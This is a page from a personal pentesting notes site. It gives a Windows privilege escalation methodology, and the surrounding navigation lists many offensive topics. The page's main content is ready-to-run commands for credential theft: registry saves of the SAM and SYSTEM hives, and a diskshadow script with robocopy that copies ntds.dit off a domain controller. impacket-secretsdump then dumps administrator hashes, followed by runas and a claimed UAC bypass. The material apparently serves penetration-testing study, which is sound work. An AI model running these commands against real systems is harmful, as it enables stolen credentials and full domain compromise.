Programmerboy Pentesting Stuff
  • Welcome
  • Web Pentesting Stuff
    • Pentesting Port 80,443
      • FFUF Commands
      • Virtual Host Scanning
      • Javascript DeObfuscation
      • Pentesting JWT (JSON Web Tokens)
      • Pentesting Graphql
      • Pentesting Redis 6379
  • CMS Pentesting
    • Wordpress Pentesting
    • Jenkins
    • Grafana
  • Network Penetration Testing
    • Nmap Commands
    • 53 - Pentesting DNS
    • 88 - Pentesting Kerberos
    • 111 - Pentesting RPC
    • 389 - Pentesting LDAP
    • 445 - Pentesting SMB
    • 873 - Pentesting Rsync
    • 1433 - Pentesting MSSQL
    • 2049 - Pentesting NFS
    • 3389 Pentesting RDP
    • 3306 - Pentesting Mysql
    • 5000 - Pentesting Docker Registry
  • Active Directory Pentesting
    • Methodology
  • Password and Bruteforce Attacks
    • Hydra
    • Cewl
    • Making Custom Wordlists (Usernames)
    • JSON to txt Wordlist
  • Linux Privilege Escalation
    • Getting a Fully Interactive TTY Shell
    • Docker Container Escape
  • Windows Privilege Escalation
    • Tunneling and Pivoting
    • Methodology
  • Bug Bounty
    • Bug Bounty Methodology
    • XSS
    • SQL Injection
    • Command Injection
    • File Upload Pentesting
    • Local and Remote File Inclusion
    • Broken Authentication
    • Server Side Request Forgery (SSRF)
    • XML External Entity (XXE)
    • Server Side Template Injection (SSTI)
    • ReconFTW (six2dez)
    • JS Files
    • SignUp Page
  • CTFs
    • WEB
    • Regex Bypass
    • Grep & Regex & Find strings
  • Python Programs for Pentesting
    • Python Code Snippets
  • Certifications-Notes
    • CRTO & Cobalt Strike
  • Phishing and Real World Stuff
    • Email Spoofing
    • Attacking Office 365 & Exchange
  • Cloud Pentesting
    • Enumeration
Powered by GitBook
On this page
  • SEBackupPrivilege
  • Second Method : SEBackupPrivilege (Domain Joined Machines)
  • RUNAS (Changing user Sessions)
  • Bypassing UAC
  1. Windows Privilege Escalation

Methodology

PreviousTunneling and PivotingNextBug Bounty Methodology

Last updated 1 month ago

SEBackupPrivilege

if you have SEBackup Privilege, then you can access any file on the system. the best way is to get sam and system file and download those to your system and get the administrator hash


reg save hklm\sam c:\users\username\sam

reg save hklm\system c:\users\username\system


# download sam and system on your kali machine and then use impacket-secretdump

impacket-secretsdump -sam sam -system system LOCAL

Second Method : SEBackupPrivilege (Domain Joined Machines)

We can use the Second Method for Domain Joined Machines

Create a file called test.dsh

persistent nowriters
add volume c: alias owo
create
expose %owo% z:

Upload this file to the target machine and then run the following command

diskshadow /s test.dsh

# then run below command 

robocopy /b z:\windows\ntds . ntds.dit

after this you should get ntds.dit file in your current working directory

we also need system file for this to work

reg save hklm\system c:\users\username\system

after you can use impacket-secretsdump and get the administrator hash.

impacket-secretsdump -ntds ntds.dit -system system LOCAL

RUNAS (Changing user Sessions)

runas /user:Administrator cmd # if you have the password of admin user

Bypassing UAC

we can bypass UAC in rdp session in a powershell shell by running the following command

Start-Process cmd.exe -verb runas # this will give you full Admin Privileges